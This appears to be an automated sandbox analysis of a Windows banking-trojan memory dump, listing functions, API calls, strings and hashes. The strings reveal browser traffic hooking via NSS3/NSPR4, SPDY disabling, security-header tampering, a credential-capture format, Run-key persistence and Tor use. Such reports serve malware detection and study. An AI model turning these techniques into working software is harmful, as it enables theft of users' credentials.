String ID: user_pref("network.http.spdy.enabled", false);$%APPDATA%\Mozilla\Firefox\Profiles$EnableSPDY3_0$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings$prefs.js
API String ID: 90276831-3405794569
Opcode ID: aba5879ca46d6559789afa19042551017ae20dc6df5145c0d3cbfa9bfd822660
Instruction ID: 8a17dbf1579d504841c3252d79d641460b62678a84bd14434c3381c6f7ddeec0
Opcode Fuzzy Hash: aba5879ca46d6559789afa19042551017ae20dc6df5145c0d3cbfa9bfd822660
Instruction Fuzzy Hash: D3413875A40308BBEB10AFA4DC85FAEBBB9EB14754F408065F501B72A0D775BE418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A0968F, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 04A0969F
CreateFileW.KERNEL32(049F117D,80000000,00000003,04A17160,00000003,00000000,00000000,?,00000000,?,049F117D), ref: 04A096BC
GetLastError.KERNEL32(?,00000000,?,049F117D), ref: 04A0975D

Part of subcall function 049F67FB: lstrlen.KERNEL32(?,00000000,00000001,00000027,04A17160,?,00000000,04A096DD,Local\,00000001,?,00000000,?,049F117D), ref: 049F6831
Part of subcall function 049F67FB: lstrcpy.KERNEL32(00000000,00000000), ref: 049F6855
Part of subcall function 049F67FB: lstrcat.KERNEL32(00000000,00000000), ref: 049F685D

GetFileSize.KERNEL32(049F117D,00000000,Local\,00000001,?,00000000,?,049F117D), ref: 04A096E8
CreateFileMappingA.KERNEL32(049F117D,04A17160,00000002,00000000,00000000,049F117D), ref: 04A096FC
lstrlen.KERNEL32(049F117D,?,00000000,?,049F117D), ref: 04A09718
lstrcpy.KERNEL32(?,049F117D), ref: 04A09728
GetLastError.KERNEL32(?,00000000,?,049F117D), ref: 04A09730
HeapFree.KERNEL32(00000000,049F117D,?,00000000,?,049F117D), ref: 04A09743
CloseHandle.KERNEL32(049F117D,Local\,00000001,?,00000000,?,049F117D), ref: 04A09755

Strings

Local\, xrefs: 04A096D0

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID: Local\
API String ID: 194907169-422136742
Opcode ID: 2ac65a33785c99bbf659c7d21a1bff14cd696e6117eb46b73c3b1634a923a169
Instruction ID: 69d23b40384c86b249ee5e7d28cef65975722ae026d7defafb05d769d54c5090
Opcode Fuzzy Hash: 2ac65a33785c99bbf659c7d21a1bff14cd696e6117eb46b73c3b1634a923a169
Instruction Fuzzy Hash: B8213BB5900208FFEF109FA4D888E9EBFB9FB14354F108469F945E22A0D3749E419B50

Uniqueness

Uniqueness Score: -1.00%

Function 04A0591B, Relevance: 18.2, APIs: 3, Strings: 9, Instructions: 217memorystringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,00000000,?,00000000,049FB3DA,?,00000000), ref: 04A059C5
HeapFree.KERNEL32(00000000,-00000008,?,?), ref: 04A05AF2
lstrlen.KERNEL32(-00000008,00000000), ref: 04A05B44

Strings

Content-Security-Policy:, xrefs: 04A05A75
Transfer-Encoding:, xrefs: 04A05B1D
Content-Type:, xrefs: 04A05A00
Content-Length:, xrefs: 04A05B2B
Content-Security-Policy-Report-Only:, xrefs: 04A05A81
X-Frame-Options, xrefs: 04A05A8D
chunked, xrefs: 04A05B18
HTTP/1.1 404 Not Found, xrefs: 04A059BD
Access-Control-Allow-Origin:, xrefs: 04A05A97, 04A05A9C, 04A05AAE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeaplstrlenmemcpy
String ID: chunked$Access-Control-Allow-Origin:$Content-Length:$Content-Security-Policy-Report-Only:$Content-Security-Policy:$Content-Type:$HTTP/1.1 404 Not Found$Transfer-Encoding:$X-Frame-Options
API String ID: 462153822-220856588
Opcode ID: 34a279a4a5e6b227e706aace700b9a6a5b8ebe1bec330bd4bfbfcdba183673a4
Instruction ID: 2614dccba609ffe059c88a39f3ddae12ee30d34338e6cb4c81554145f1b19d54
Opcode Fuzzy Hash: 34a279a4a5e6b227e706aace700b9a6a5b8ebe1bec330bd4bfbfcdba183673a4
Instruction Fuzzy Hash: 30815CB1A00204FFEF54DF65D8C4AA97BA8FF05364B118199EC05AB296E774F841CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04A0DD91, Relevance: 18.2, APIs: 12, Instructions: 182synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 04A0DDB8
memcpy.NTDLL(?,?,00000010), ref: 04A0DDDB
memset.NTDLL ref: 04A0DE27
lstrcpyn.KERNEL32(?,?,00000034), ref: 04A0DE3B
GetLastError.KERNEL32 ref: 04A0DE66
GetLastError.KERNEL32 ref: 04A0DEAD
GetLastError.KERNEL32 ref: 04A0DECC
WaitForSingleObject.KERNEL32(?,000927C0), ref: 04A0DF06
WaitForSingleObject.KERNEL32(?,00000000), ref: 04A0DF14
GetLastError.KERNEL32 ref: 04A0DF8E
ReleaseMutex.KERNEL32(?), ref: 04A0DFA0
RtlExitUserThread.NTDLL(?), ref: 04A0DFB6

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 6eacd07fbc3dbdc7dee84ed9f3a02d08bbf38ae5634550e98771adc47db2c313
Instruction ID: 84cdb016f2ad9bf697a325ec6ed2633c3e85b0df56c1c76f2680c040cf55576b
Opcode Fuzzy Hash: 6eacd07fbc3dbdc7dee84ed9f3a02d08bbf38ae5634550e98771adc47db2c313
Instruction Fuzzy Hash: E1617872504300AFE7219F65E848A6BB7F9FF94720F00CA1AF996D21D0EB74E805CB52

Uniqueness

Uniqueness Score: -1.00%

Function 049F90CC, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 049F90FE
WaitForSingleObject.KERNEL32(000003CC,00000000), ref: 049F9120
ConnectNamedPipe.KERNEL32(?,?), ref: 049F9140
GetLastError.KERNEL32 ref: 049F914A
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049F916E
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 049F91B1
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 049F91BA
WaitForSingleObject.KERNEL32(00000000), ref: 049F91C3
CloseHandle.KERNEL32(?), ref: 049F91D8
GetLastError.KERNEL32 ref: 049F91E5
CloseHandle.KERNEL32(?), ref: 049F91F2
RtlExitUserThread.NTDLL(000000FF), ref: 049F9208

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: 1d43055aa14703f407159ce8140dd1de375b5a549d0b169cd98abf8ddb74ac3d
Instruction ID: 4530161ed5472742c6ab59c1a78de2d1bfd2e08fdd8502bd06081985a724eabd
Opcode Fuzzy Hash: 1d43055aa14703f407159ce8140dd1de375b5a549d0b169cd98abf8ddb74ac3d
Instruction Fuzzy Hash: F9316EB1504305AFFB019F68DC4896BBBBDFB44324F004A39FA65D21A0D774AE468B92

Uniqueness

Uniqueness Score: -1.00%

Function 04A036C9, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 164memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 04A03702
memset.NTDLL ref: 04A03716

Part of subcall function 04A0CFA6: RegQueryValueExA.KERNELBASE(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,00000003,00000000,?,00000000,?,04A0E66E,04A0E66E,?,04A088E0,00000000), ref: 04A0CFDE
Part of subcall function 04A0CFA6: RtlAllocateHeap.NTDLL(00000000,04A088E0), ref: 04A0CFF2
Part of subcall function 04A0CFA6: RegQueryValueExA.ADVAPI32(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A0D00C
Part of subcall function 04A0CFA6: RegCloseKey.KERNELBASE(?,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A0D036

GetCurrentThreadId.KERNEL32 ref: 04A037A5
GetCurrentThread.KERNEL32 ref: 04A037B8
RtlEnterCriticalSection.NTDLL(05A98D20), ref: 04A0385F
Sleep.KERNEL32(0000000A), ref: 04A03869
RtlLeaveCriticalSection.NTDLL(05A98D20), ref: 04A0388F
HeapFree.KERNEL32(00000000,?), ref: 04A038BD
HeapFree.KERNEL32(00000000,00000018), ref: 04A038D0

Strings

TorClient, xrefs: 04A03728

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
String ID: TorClient
API String ID: 1146182784-3399603969
Opcode ID: af2ea6a6313948ea5c72e6f34790b0e36a154477c156549445a2559bf786955b
Instruction ID: 630953658270e1e4cb5f3763d4da948a2f5b6a6ddbcb184694a22ea981778bd0
Opcode Fuzzy Hash: af2ea6a6313948ea5c72e6f34790b0e36a154477c156549445a2559bf786955b
Instruction Fuzzy Hash: E7515EB5908301AFEB10DF24E98485ABBF8FB58344F044D6EF995D72A0D734ED498B52

Uniqueness

Uniqueness Score: -1.00%

Function 04A0E28E, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 115registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 04A0E2A6
RtlEnterCriticalSection.NTDLL(00000000), ref: 04A0E2E7
RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 04A0E2FB
CloseHandle.KERNEL32(?,?,?,00000000), ref: 04A0E350
HeapFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 04A0E39B
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 04A0E3A9
RtlLeaveCriticalSection.NTDLL(00000000), ref: 04A0E3B4

Part of subcall function 04A01A14: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 04A01A28
Part of subcall function 04A01A14: memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,04A00C7C,00000000,00000000,00000001,?,04A0C101,00000020,00000000,?,00000000), ref: 04A01A51
Part of subcall function 04A01A14: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 04A01A7A
Part of subcall function 04A01A14: RegCloseKey.ADVAPI32(00000000,?,04A00C7C,00000000,00000000,00000001,?,04A0C101,00000020,00000000,?,00000000,?,00000000,00000000), ref: 04A01AA5

Strings

Client32, xrefs: 04A0E2B7
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 04A0E2F1
rundll32, xrefs: 04A0E359, 04A0E35E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
String ID: Client32$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
API String ID: 3181710096-668865654
Opcode ID: b7093730b6ca3dfe10110d28494aee5f4aedc6dea9d7f6b10c60e4e7a72fdc12
Instruction ID: e52ae9d8aa04af9851c36255267afcd8eaaaec8f6ac19658ac5f8cbcff576aef
Opcode Fuzzy Hash: b7093730b6ca3dfe10110d28494aee5f4aedc6dea9d7f6b10c60e4e7a72fdc12
Instruction Fuzzy Hash: 9F31D272600210FBEB215F64EC48FAFBEB9EB54B11F144825F906E61A0D774AD42EB61

Uniqueness

Uniqueness Score: -1.00%

Function 049F662B, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 049F6650
StrChrA.SHLWAPI(00000001,0000002C), ref: 049F6663
StrTrimA.SHLWAPI(?,20000920), ref: 049F6686
StrTrimA.SHLWAPI(00000001,20000920), ref: 049F6695
lstrlen.KERNEL32(?), ref: 049F66CA
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 049F66DD
lstrcpy.KERNEL32(00000004,?), ref: 049F66FB
HeapFree.KERNEL32(00000000,00000000,Scr,00000000,-00000005,00000001), ref: 049F6721

Strings

Scr, xrefs: 049F6705, 049F6757
W, xrefs: 049F6638

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: Scr$W
API String ID: 1974185407-3281027876
Opcode ID: e9f85aecf64f679f96cb270fcc836d758b73325393f689c716a2260db00a29a9
Instruction ID: 3c28a4f086097118c54aae624b093013ac31e7bd126a0e43dd85f91d3459f3ef
Opcode Fuzzy Hash: e9f85aecf64f679f96cb270fcc836d758b73325393f689c716a2260db00a29a9
Instruction Fuzzy Hash: C6317A35500314FFEB119FA9DC44FAA7EBCEB58750F148066B904D7260E775AD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049F740B, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A02F29: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04A02F5B
Part of subcall function 04A02F29: HeapFree.KERNEL32(00000000,00000000,?,?,049F7427,?,00000022,00000000,00000000,00000000,?,?), ref: 04A02F80

Part of subcall function 049FC659: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,049F7448,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 049FC693
Part of subcall function 049FC659: HeapFree.KERNEL32(00000000,00000000,049F7448,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 049FC6DF

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 049F747D
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 049F7485
lstrlen.KERNEL32(?), ref: 049F748F
RtlAllocateHeap.NTDLL(00000000,?), ref: 049F74A4
wsprintfA.USER32 ref: 049F74D9
HeapFree.KERNEL32(00000000,00000000,0000011E,00000000,00000000,00000000), ref: 049F74FB
HeapFree.KERNEL32(00000000,?), ref: 049F7510
HeapFree.KERNEL32(00000000,?), ref: 049F751D
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 049F752B

Strings

URL: %suser=%spass=%s, xrefs: 049F74D3

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID: URL: %suser=%spass=%s
API String ID: 168057987-1589266237
Opcode ID: 846b6a5eaa430b61825454d073addf59a7fd7338de4bd00d4b5a2aad22893d1e
Instruction ID: c173da36e5db8f3fbe19c3a58262ccf4348b145e392521906000542c5b613f1b
Opcode Fuzzy Hash: 846b6a5eaa430b61825454d073addf59a7fd7338de4bd00d4b5a2aad22893d1e
Instruction Fuzzy Hash: 6D31C031604315BFEB11AFA0EC44E5BBEE8EF88714F00493AFA44A21A1D774ED15CB92

Uniqueness

Uniqueness Score: -1.00%

Function 049F1A2E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 049F1A3A
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 049F1A50
_snwprintf.NTDLL ref: 049F1A75
CreateFileMappingW.KERNEL32(000000FF,04A17160,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 049F1A91
GetLastError.KERNEL32 ref: 049F1AA3
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 049F1ABA
CloseHandle.KERNEL32(00000000), ref: 049F1ADB
GetLastError.KERNEL32 ref: 049F1AE3

Strings

Local\, xrefs: 049F1A64

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: Local\
API String ID: 1814172918-422136742
Opcode ID: de798a278fd97a2e969fb759b02376159bd48b517531f0ebd79590941817380e
Instruction ID: 7536ca05b093f584af4aeb111582db0df8879f9d3b0f419f9f4457688a2274cf
Opcode Fuzzy Hash: de798a278fd97a2e969fb759b02376159bd48b517531f0ebd79590941817380e
Instruction Fuzzy Hash: E621C376601204FBEB11DFA5DC05F9A77B9EB54750F254221FB05E71A0E670ED058B90

Uniqueness

Uniqueness Score: -1.00%

Function 049F1882, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSPR4.DLL,?,00000000,00000000,04A0A741,00000000,74B5F5B0,049FBBA1,61636F4C,00000001,?,?,?,00000000), ref: 049F189B
LoadLibraryA.KERNEL32(NSS3.DLL,?,00000000), ref: 049F18A9
LoadLibraryA.KERNEL32(xul.dll,?,00000000), ref: 049F18BE
GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 049F18CC
GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 049F18D9

Strings

PR_GetError, xrefs: 049F18C6
PR_SetError, xrefs: 049F18CE
NSS3.DLL, xrefs: 049F18A3, 049F18A8
NSPR4.DLL, xrefs: 049F188B, 049F1890
xul.dll, xrefs: 049F18B9

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AddressProc
String ID: NSPR4.DLL$NSS3.DLL$PR_GetError$PR_SetError$xul.dll
API String ID: 1469910268-282796573
Opcode ID: a7172f1c123a68ab3d947e651dcf2edc51a3efb5c296ce624a9df8e0f0adf212
Instruction ID: cc9b292efd397ad0168ba8620a63c1a2132b3b983687dbe905bc0948b44a0605
Opcode Fuzzy Hash: a7172f1c123a68ab3d947e651dcf2edc51a3efb5c296ce624a9df8e0f0adf212
Instruction Fuzzy Hash: 192160B5A41310ABE701DFADF982B0177E9F769760B41016AE648D7370D6B8AC438B94

Uniqueness

Uniqueness Score: -1.00%

Function 049F5979, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 049F59AF
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 049F59C4
RegCreateKeyA.ADVAPI32(80000001,?), ref: 049F59EC
HeapFree.KERNEL32(00000000,00000001), ref: 049F5A2D
HeapFree.KERNEL32(00000000,?), ref: 049F5A3D
RtlAllocateHeap.NTDLL(00000000,049F49CF), ref: 049F5A50
RtlAllocateHeap.NTDLL(00000000,049F49CF), ref: 049F5A5F
HeapFree.KERNEL32(00000000,?,?,049F49CF,?,00000001,?,?), ref: 049F5AA9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,049F49CF,?,00000001), ref: 049F5ACD
HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,049F49CF,?,00000001), ref: 049F5AF2
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,049F49CF,?,00000001), ref: 049F5B07

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 7a637a3fae0f0c881911cefebbb5f062a9f6c16a037da5ea4d839ba63a2d8225
Instruction ID: 5531fe39c89219631171dcfb1bb2e5eef1147ef2b8721f1e94a3db1503ef98da
Opcode Fuzzy Hash: 7a637a3fae0f0c881911cefebbb5f062a9f6c16a037da5ea4d839ba63a2d8225
Instruction Fuzzy Hash: EF51ACB5900219FFDF01DFA4DC848EEBBB9FB18314F11446AEA15A2260D335AE91DF60

Uniqueness

Uniqueness Score: -1.00%

Function 049FEB3D, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 049FF8F0: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,049F7633,00000000,00000000,00000004,00000000,?,049FCDE0,00000000,?,00000000), ref: 049FF8FC
Part of subcall function 049FF8F0: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049F7633,00000000,00000000,00000004,00000000,?,049FCDE0,00000000), ref: 049FF95A
Part of subcall function 049FF8F0: lstrcpy.KERNEL32(00000000,00000000), ref: 049FF96A

lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 049FEB89
wsprintfA.USER32 ref: 049FEBB7
lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 049FEC15
GetLastError.KERNEL32 ref: 049FEC2C
ResetEvent.KERNEL32(?), ref: 049FEC40
ResetEvent.KERNEL32(?), ref: 049FEC45
GetLastError.KERNEL32 ref: 049FEC5D

Strings

`, xrefs: 049FEBF0
Content-Type: application/octet-stream, xrefs: 049FEBAD

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
String ID: Content-Type: application/octet-stream$`
API String ID: 2276693960-1382853987
Opcode ID: 65c297f56e9151d7fae7957e2a15547bd0053d93e66053b4a4766e45df608cba
Instruction ID: 57ee191f5eec6db521f7a2deebcaff2ceeacc0632167f83352729633075cdc11
Opcode Fuzzy Hash: 65c297f56e9151d7fae7957e2a15547bd0053d93e66053b4a4766e45df608cba
Instruction Fuzzy Hash: 39415B75800209AFEF11EFA4DD88BAA7BB9FF18315F00452AF95192160E734EA15DB61

Uniqueness

Uniqueness Score: -1.00%

Function 049FA314, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,04A059F2,00000000), ref: 049FA32E
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 049FA343
memset.NTDLL ref: 049FA350
HeapFree.KERNEL32(00000000,00000000,?,04A059F1,?,?,00000000,?,00000000,049FB3DA,?,00000000), ref: 049FA36D
memcpy.NTDLL(?,?,04A059F1,?,04A059F1,?,?,00000000,?,00000000,049FB3DA,?,00000000), ref: 049FA38E

Strings

Transfer-Encoding:, xrefs: 049FA3EB
Referer: , xrefs: 049FA40C
Content-Length:, xrefs: 049FA3BE
chun, xrefs: 049FA3FC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: Content-Length:$Referer: $Transfer-Encoding:$chun
API String ID: 2362494589-2246273904
Opcode ID: a954d9adab239ada4e5c6309086d83bdb24dd8f21571dcc6a0b261fe2f1ad193
Instruction ID: 52f3e24e0a5b6aa85c8b5f8819eebcd693215c8147729908de36d15972554c74
Opcode Fuzzy Hash: a954d9adab239ada4e5c6309086d83bdb24dd8f21571dcc6a0b261fe2f1ad193
Instruction Fuzzy Hash: 5031AD31600711AFE7319F65DC44E27BBE9EF54714F01843AEA5A97660E770F902CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049F2F05, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,00000020), ref: 049F2F1D
StrChrA.SHLWAPI(00000001,00000020), ref: 049F2F2E

Part of subcall function 049F7A5A: lstrlen.KERNEL32(049FFBBB,?,00000000,00000000,?,049FFBBB,00000000,Referer: ,00000001,00000000,00000001), ref: 049F7A6C
Part of subcall function 049F7A5A: StrChrA.SHLWAPI(00000001,0000000D,?,049FFBBB,00000000,Referer: ,00000001,00000000,00000001), ref: 049F7AA4

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 049F2F67
memcpy.NTDLL(00000000,http://,00000007), ref: 049F2F8D
memcpy.NTDLL(00000000,?,?,00000000,http://,00000007), ref: 049F2F9C
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007), ref: 049F2FAE

Strings

Host:, xrefs: 049F2F3E
http://, xrefs: 049F2F82, 049F2F8B
https://, xrefs: 049F2F79

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID: Host:$http://$https://
API String ID: 1819133394-2811860193
Opcode ID: 7e74a00109542dbdb947a78ab0835b62ad6a45fd2ae871358e769be7a7d6030b
Instruction ID: d278edb466569532a3ede93e69fd1d4090786d651efde6e803bc97bfebabf2eb
Opcode Fuzzy Hash: 7e74a00109542dbdb947a78ab0835b62ad6a45fd2ae871358e769be7a7d6030b
Instruction Fuzzy Hash: BA219072640219BFEB119F99CC44F9ABBACEF54744F1540A6FA04DB250E675FE80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049F647B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55registrymemorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(049F29FA,00000000,00000000,04A173C0,?,?,04A03A77,049F29FA,00000000,049F29FA,04A173A0), ref: 049F648E
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 049F649C
wsprintfA.USER32 ref: 049F64B1
RegCreateKeyA.ADVAPI32(80000001,04A173A0,00000000), ref: 049F64C9
lstrlen.KERNEL32(?), ref: 049F64D8
RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 049F64E6
RegCloseKey.ADVAPI32(?), ref: 049F64F1
HeapFree.KERNEL32(00000000,00000000), ref: 049F6500

Strings

@%s@, xrefs: 049F64AB

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
String ID: @%s@
API String ID: 1575615994-4128794767
Opcode ID: 84d952122a40105ebc406e7dd2a6e23d4126eecb01be0b64d996e6f9a9ac5f1e
Instruction ID: 57880038e0b6354a316d5cb7ecfd1803bb1b3941bb346bb89665b1f09e5e53c8
Opcode Fuzzy Hash: 84d952122a40105ebc406e7dd2a6e23d4126eecb01be0b64d996e6f9a9ac5f1e
Instruction Fuzzy Hash: BB014C36100208BFEB115F94EC49FAA3B7DEB65750F104025FA05D1160DBBAAE12DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A0B370, Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04A0B3E7
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04A0B406

Part of subcall function 049F6405: wsprintfA.USER32 ref: 049F6418
Part of subcall function 049F6405: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 049F642A
Part of subcall function 049F6405: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 049F6454
Part of subcall function 049F6405: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049F6467
Part of subcall function 049F6405: CloseHandle.KERNEL32(?), ref: 049F6470

GetLastError.KERNEL32 ref: 04A0B6D9
RtlEnterCriticalSection.NTDLL(?), ref: 04A0B6E9
RtlLeaveCriticalSection.NTDLL(?), ref: 04A0B6FA
RtlExitUserThread.NTDLL(?), ref: 04A0B708

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
String ID:
API String ID: 1258333524-0
Opcode ID: ad36b59fbca2e2edbc37c766ba55e12e3436ffb0f728707a5fbd53e9fa933d7e
Instruction ID: 6cdfb2f1337bf41b9cb09b10ecf19bd4baada6c8042367abc09cfef51f98bbac
Opcode Fuzzy Hash: ad36b59fbca2e2edbc37c766ba55e12e3436ffb0f728707a5fbd53e9fa933d7e
Instruction Fuzzy Hash: BAB13F71900209AFEB209FA1DD84AAA7BF9FF08305F108569F916D21A0D775F955CF21

Uniqueness

Uniqueness Score: -1.00%

Function 04A10454, Relevance: 15.1, APIs: 10, Instructions: 96filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 049FF9A1: memset.NTDLL ref: 049FF9C3
Part of subcall function 049FF9A1: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 049FFA70

